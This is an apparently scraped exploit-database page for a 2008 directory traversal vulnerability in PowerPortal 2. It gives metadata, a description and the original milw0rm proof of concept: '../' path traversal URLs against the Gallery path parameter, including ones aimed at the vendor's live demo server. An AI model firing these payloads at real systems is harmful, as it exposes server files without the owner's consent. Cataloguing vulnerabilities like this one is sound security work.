header-logo
Suggest Exploit
vendor:
PowerPortal2
by:
r45c4l
8.5
CVSS
HIGH
Local Directory Traversal
22
CWE
Product Name: PowerPortal2
Affected Version From: 2.0.0.0
Affected Version To: 2.0.0.0
Patch Exists: NO
Related CWE: N/A
CPE: a:powerportal2:powerportal2:2.0.0.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PowerPortal 2 Local Directory Traversal Vulnerability

PowerPortal 2 is prone to a local directory-traversal vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to view arbitrary files from the underlying file system, potentially resulting in the disclosure of sensitive information. This issue affects version 2.0.0.0; other versions may also be vulnerable.

Mitigation:

No known mitigation or remediation for this vulnerability
Source

Exploit-DB raw data:

################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu     # 
#-Marezzi-P47tr1ck- FeDeReR -MAGE -JeTFyrE- DON-Outlawz        #
#        and all darkc0de and NikTrix members               ---# 
################################################################ 
# 
# Author: r45c4l 
# 
# Home  : www.darkc0de.com & niktrix.info
# 
# Email : r45c4l@hotmail.com 
# 
# Share the c0de! 
# 
################################################################ 
# 
# Title:  PowerPortal 2 Local Directory Traversal Vulnerability
#
# VEndor: http://www.powerportal2.com/
# 
#
###########################################################
#
# d0rk: n/a
#
###########################################################
 
     POC :- 
	
	http://site.com/index/Gallery/?path=../../../../../../../       
   
     Live Demo: 
	
	http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../

	http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../dev
 
###########################################################
#
#  Bug discovered : 28 Sep.2008
###########################################################

# milw0rm.com [2008-09-27]